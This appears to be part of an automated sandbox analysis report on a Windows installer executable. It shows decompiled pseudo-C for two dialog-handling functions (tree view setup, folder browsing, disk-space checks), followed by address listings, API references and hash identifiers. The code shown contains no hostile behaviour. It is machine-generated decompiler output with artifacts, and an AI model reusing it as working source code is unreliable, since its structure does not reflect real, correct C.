				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x42ec48; // 0x6e12bc
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x42ec30; // 0x6e1110
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x42ec39 & 0x00000002;
							if(( *0x42ec39 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404782(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x42ec38; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x42a07c;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x42a094;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x42a07c = _t315;
									 *0x42a094 = _t315;
									 *0x42ec80 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x42ec39 & 0x00000001;
										if(( *0x42ec39 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x42ec4c - _t315; // 0x3
										_v32 =  *0x42a094;
										_t196 =  *0x42ec48; // 0x6e12bc
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42e3fc; // 0x6e8212
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E0040473D(0x3ff, 0xfffffffb, E00404755(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x6e12c4
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x6e12d4
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x42ec4c; // 0x3
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x42a094);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x42ec80 = _a4;
					_t247 =  *0x42ec4c; // 0x3
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42a094 = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x42ec20, 0x6e);
					 *0x42a088 =  *0x42a088 | 0xffffffff;
					_v24 = _t250;
					 *0x42a090 = SetWindowLongA(_v8, 0xfffffffc, E00404E03);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42a07c = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42a07c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405BE9(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E83(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E83(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x42ec4c - _t318; // 0x3
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42a094 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42a094 + _t318 * 4) = _t274;
									_t288 =  *( *0x42a094 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x42ec4c; // 0x3
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403EB8(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403EB8(_v12);
								L89:
								return E00403EEA(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}






































































                        0x00404820
                        0x00404826
                        0x00404828
                        0x0040482e
                        0x00404834
                        0x00404837
                        0x00404841
                        0x0040484a
                        0x0040484d
                        0x00404850
                        0x00404a78
                        0x00404a78
                        0x00404a7f
                        0x00404a93
                        0x00404a81
                        0x00404a83
                        0x00404a86
                        0x00404a87
                        0x00404a8e
                        0x00404a8e
                        0x00404a96
                        0x00404a9f
                        0x00404aaa
                        0x00404aaa
                        0x00404aad
                        0x00404ab0
                        0x00404abf
                        0x00404abf
                        0x00404ac6
                        0x00404b3e
                        0x00404b3e
                        0x00404b41
                        0x00404b43
                        0x00404b46
                        0x00404b4d
                        0x00404b5b
                        0x00404b5b
                        0x00404b5d
                        0x00404b60
                        0x00404b67
                        0x00404b69
                        0x00404b6d
                        0x00404b8a
                        0x00404b8e
                        0x00404b8e
                        0x00404b6f
                        0x00404b7c
                        0x00404b7c
                        0x00404b6d
                        0x00404b67
                        0x00000000
                        0x00404b41
                        0x00404ac8
                        0x00404acb
                        0x00404ad6
                        0x00404ad8
                        0x00404adb
                        0x00404ae2
                        0x00404ae7
                        0x00404ae9
                        0x00404af3
                        0x00404af3
                        0x00404af7
                        0x00404af9
                        0x00404afc
                        0x00404afe
                        0x00404b01
                        0x00404b17
                        0x00404b17
                        0x00404b03
                        0x00404b03
                        0x00404b09
                        0x00404b0b
                        0x00404b12
                        0x00404b0d
                        0x00404b0d
                        0x00404b0d
                        0x00404b0b
                        0x00404b1b
                        0x00404b1d
                        0x00404b22
                        0x00404b2b
                        0x00404b2c
                        0x00404b36
                        0x00404b36
                        0x00404b38
                        0x00404b3b
                        0x00404b3b
                        0x00404afc
                        0x00000000
                        0x00404ae9
                        0x00404acd
                        0x00404ad0
                        0x00404ad4
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00404ad4
                        0x00404ab2
                        0x00404ab9
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00404aa1
                        0x00404aa1
                        0x00404aa4
                        0x00404b91
                        0x00404b91
                        0x00404b98
                        0x00404c0c
                        0x00404c0c
                        0x00404c13
                        0x00404c1f
                        0x00404c1f
                        0x00404c21
                        0x00404c28
                        0x00404c2a
                        0x00404c2f
                        0x00404c31
                        0x00404c34
                        0x00404c34
                        0x00404c3a
                        0x00404c3f
                        0x00404c41
                        0x00404c44
                        0x00404c44
                        0x00404c4a
                        0x00404c50
                        0x00404c56
                        0x00404c56
                        0x00404c5c
                        0x00404c63
                        0x00404db0
                        0x00404db0
                        0x00404db7
                        0x00404db9
                        0x00404dc0
                        0x00404dc4
                        0x00404dd1
                        0x00404dd1
                        0x00404dd4
                        0x00404dda
                        0x00404dec
                        0x00404dec
                        0x00404dc0
                        0x00000000
                        0x00404c69
                        0x00404c6b
                        0x00404c70
                        0x00404c73
                        0x00404c77
                        0x00404c77
                        0x00404c7c
                        0x00404c7f
                        0x00404cc0
                        0x00404cc2
                        0x00404ccc
                        0x00404cd2
                        0x00404cd5
                        0x00404cda
                        0x00404ce1
                        0x00404ce4
                        0x00404d86
                        0x00404d8c
                        0x00404d92
                        0x00404d97
                        0x00404d9a
                        0x00404dab
                        0x00404dab
                        0x00000000
                        0x00404cea
                        0x00404cea
                        0x00404cea
                        0x00404ced
                        0x00404cf3
                        0x00404cf6
                        0x00404cf8
                        0x00404cfa
                        0x00404cfc
                        0x00404cff
                        0x00404d02
                        0x00404d09
                        0x00404d0b
                        0x00404d0e
                        0x00404d15
                        0x00404d18
                        0x00404d18
                        0x00404d18
                        0x00404d18
                        0x00404d1c
                        0x00404d1f
                        0x00404d2b
                        0x00404d2c
                        0x00404d2f
                        0x00404d31
                        0x00404d31
                        0x00404d31
                        0x00404d21
                        0x00404d23
                        0x00404d23
                        0x00404d50
                        0x00404d50
                        0x00404d51
                        0x00404d5d
                        0x00404d6c
                        0x00404d6c
                        0x00404d6e
                        0x00404d71
                        0x00404d7a
                        0x00404d7a
                        0x00000000
                        0x00404ced
                        0x00404c81
                        0x00404c8c
                        0x00404c8f
                        0x00404c94
                        0x00404c96
                        0x00404c98
                        0x00404c9a
                        0x00404caa
                        0x00404cb4
                        0x00404cb6
                        0x00404cb9
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00404c9c
                        0x00404c9c
                        0x00404c9c
                        0x00404c9f
                        0x00404ca2
                        0x00404ca4
                        0x00404ca4
                        0x00404ca4
                        0x00404ca5
                        0x00404ca6
                        0x00404ca6
                        0x00000000
                        0x00404c9c
                        0x00404c7f
                        0x00404c63
                        0x00404b9a
                        0x00404ba0
                        0x00000000
                        0x00000000
                        0x00404bac
                        0x00404bb0
                        0x00000000
                        0x00000000
                        0x00404bc0
                        0x00404bc2
                        0x00404bc5
                        0x00000000
                        0x00000000
                        0x00404bd7
                        0x00404bd9
                        0x00404bdc
                        0x00404be6
                        0x00404be8
                        0x00404be9
                        0x00404bea
                        0x00404bf9
                        0x00404bfb
                        0x00404c02
                        0x00404c05
                        0x00000000
                        0x00404c05
                        0x00404bde
                        0x00404be1
                        0x00404be4
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00404be4
                        0x00000000
                        0x00404aa4
                        0x00404856
                        0x0040485b
                        0x00404860
                        0x00404865
                        0x00404866
                        0x0040486f
                        0x0040487a
                        0x00404885
                        0x0040488b
                        0x00404899
                        0x004048ae
                        0x004048b3
                        0x004048be
                        0x004048c7
                        0x004048dc
                        0x004048ed
                        0x004048fa
                        0x004048fa
                        0x004048ff
                        0x00404905
                        0x00404907
                        0x0040490a
                        0x0040490f
                        0x00404914
                        0x00404916
                        0x00404916
                        0x00404936
                        0x00404936
                        0x00404938
                        0x00404939
                        0x0040493e
                        0x00404941
                        0x00404944
                        0x00404948
                        0x0040494d
                        0x00404952
                        0x00404956
                        0x0040495b
                        0x00404960
                        0x00404962
                        0x00404964
                        0x0040496a
                        0x00404a34
                        0x00404a47
                        0x00000000
                        0x00404970
                        0x00404973
                        0x00404976
                        0x00404979
                        0x00404979
                        0x0040497f
                        0x00404985
                        0x00404988
                        0x0040498e
                        0x0040498f
                        0x00404994
                        0x0040499d
                        0x004049a4
                        0x004049a7
                        0x004049aa
                        0x004049ad
                        0x004049e7
                        0x004049e9
                        0x00404a12
                        0x004049eb
                        0x004049f8
                        0x004049f8
                        0x004049af
                        0x004049b2
                        0x004049c1
                        0x004049cb
                        0x004049d3
                        0x004049da
                        0x004049e2
                        0x004049e2
                        0x004049ad
                        0x00404a18
                        0x00404a19
                        0x00404a1f
                        0x00404a25
                        0x00404a25
                        0x00404a32
                        0x00404a4d
                        0x00404a51
                        0x00404a6e
                        0x00404a73
                        0x00404a76
                        0x00404a76
                        0x00000000
                        0x00404a53
                        0x00404a58
                        0x00404a61
                        0x00404dee
                        0x00404e00
                        0x00404e00
                        0x00404a51
                        0x00000000
                        0x00404a32
                        0x0040496a

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                        • String ID: $M$N
                        • API String ID: 1638840714-813528018
                        • Opcode ID: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
                        • Instruction ID: 6f0a98d5dd10ef4145f29f69d97320cca22844812bd755e22afdd9aff1593a00
                        • Opcode Fuzzy Hash: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
                        • Instruction Fuzzy Hash: A702B1B0A00209EFEB25CF95DD45AAE7BB5FB84314F10413AF610BA2E1C7799A41CF58
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004042C1, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 273stringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 78%
                        			E004042C1(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x429870;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x42f000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040546C(0x3fb, _t146);
					E00405E29(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040546C(0x3fb, _t146);
							if(E0040579B(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405BC7(0x429068, _t146);
							_t87 = E00405F57(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405BC7(0x429068, _t146);
								_t89 = E0040574E(0x429068);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429068,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429068) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429068,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t159 = E00405701(0x429068) - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429068) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404755(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42e3fc; // 0x6e8212
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E0040473D(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429058);
									} else {
										E00404678(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42ecc4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00403EA5(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42a08c == _t158) {
									E00404256();
								}
								 *0x42a08c = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a0a0;
							_v60 = E00404612;
							_v56 = _t146;
							_v68 = E00405BE9(_t146, 0x42a0a0, _t166, 0x429470, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E004056BA(_t146);
								_t124 =  *0x42ec30; // 0x6e1110
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t146 == "C:\\Users\\alfons\\AppData\\Local\\Temp") {
									E00405BE9(_t146, 0x42a0a0, _t166, 0, _t125);
									if(lstrcmpiA(0x42dbc0, 0x42a0a0) != 0) {
										lstrcatA(_t146, 0x42dbc0);
									}
								}
								 *0x42a08c =  *0x42a08c + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405727(_t146) != 0 && E0040574E(_t146) == 0) {
						E004056BA(_t146);
					}
					 *0x42e3f8 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E83(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E83(_t166);
					E00403EB8(_t165);
					_t138 = E00405F57(0xa);
					if(_t138 == 0) {
						L53:
						return E00403EEA(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                        0x004042c1
                        0x004042c7
                        0x004042cd
                        0x004042da
                        0x004042e8
                        0x004042eb
                        0x004042f3
                        0x004042f9
                        0x004042f9
                        0x00404305
                        0x00404308
                        0x00404376
                        0x0040437d
                        0x00404454
                        0x0040445b
                        0x0040446a
                        0x0040446a
                        0x0040446e
                        0x00404478
                        0x00404485
                        0x00404487
                        0x00404487
                        0x00404495
                        0x0040449c
                        0x004044a3
                        0x004044a6
                        0x004044dd
                        0x004044df
                        0x004044e5
                        0x004044ea
                        0x004044ee
                        0x004044f0
                        0x004044f0
                        0x0040450c
                        0x00000000
                        0x0040450e
                        0x00404511
                        0x0040451f
                        0x00404525
                        0x00404526
                        0x00404529
                        0x0040452c
                        0x00000000
                        0x0040452c
                        0x004044a8
                        0x004044aa
                        0x004044ae
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004044b0
                        0x004044b0
                        0x004044bd
                        0x004044c2
                        0x00000000
                        0x00000000
                        0x004044c6
                        0x004044c8
                        0x004044c8
                        0x004044d3
                        0x004044d6
                        0x004044db
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004044db
                        0x00404538
                        0x00404542
                        0x00404545
                        0x00404548
                        0x0040454f
                        0x0040454f
                        0x00404551
                        0x00404551
                        0x00404556
                        0x00404558
                        0x00404560
                        0x00404567
                        0x00404569
                        0x00404574
                        0x00404574
                        0x00404569
                        0x0040457b
                        0x00404584
                        0x0040458e
                        0x00404596
                        0x004045b1
                        0x00404598
                        0x004045a1
                        0x004045a1
                        0x00404596
                        0x004045b6
                        0x004045bb
                        0x004045c0
                        0x004045c9
                        0x004045c9
                        0x004045d2
                        0x004045d4
                        0x004045d4
                        0x004045e0
                        0x004045e8
                        0x004045f2
                        0x004045f2
                        0x004045f7
                        0x00000000
                        0x004045f7
                        0x004044a6
                        0x0040445d
                        0x00404464
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00404464
                        0x00404383
                        0x0040438c
                        0x004043a6
                        0x004043ab
                        0x004043b5
                        0x004043bc
                        0x004043c8
                        0x004043cb
                        0x004043ce
                        0x004043d5
                        0x004043dd
                        0x004043e0
                        0x004043e4
                        0x004043eb
                        0x004043f3
                        0x0040444d
                        0x004043f5
                        0x004043f6
                        0x004043fd
                        0x00404402
                        0x00404407
                        0x0040440f
                        0x0040441c
                        0x00404430
                        0x00404434
                        0x00404434
                        0x00404430
                        0x00404439
                        0x00404446
                        0x00404446
                        0x004043f3
                        0x00000000
                        0x004043ab
                        0x00404399
                        0x00000000
                        0x00000000
                        0x0040439f
                        0x00000000
                        0x0040430a
                        0x00404317
                        0x00404320
                        0x0040432d
                        0x0040432d
                        0x00404334
                        0x0040433a
                        0x00404343
                        0x00404346
                        0x00404349
                        0x00404351
                        0x00404354
                        0x00404357
                        0x0040435d
                        0x00404364
                        0x0040436b
                        0x004045fd
                        0x0040460f
                        0x00404371
                        0x00404374
                        0x00000000
                        0x00404374
                        0x0040436b

                        APIs
                        • GetDlgItem.USER32 ref: 00404310
                        • SetWindowTextA.USER32(00000000,?), ref: 0040433A
                        • SHBrowseForFolderA.SHELL32(?,00429470,?), ref: 004043EB
                        • CoTaskMemFree.OLE32(00000000), ref: 004043F6
                        • lstrcmpiA.KERNEL32(TclpOwkq,0042A0A0,00000000,?,?), ref: 00404428
                        • lstrcatA.KERNEL32(?,TclpOwkq), ref: 00404434
                        • SetDlgItemTextA.USER32 ref: 00404446
                          • Part of subcall function 0040546C: GetDlgItemTextA.USER32 ref: 0040547F
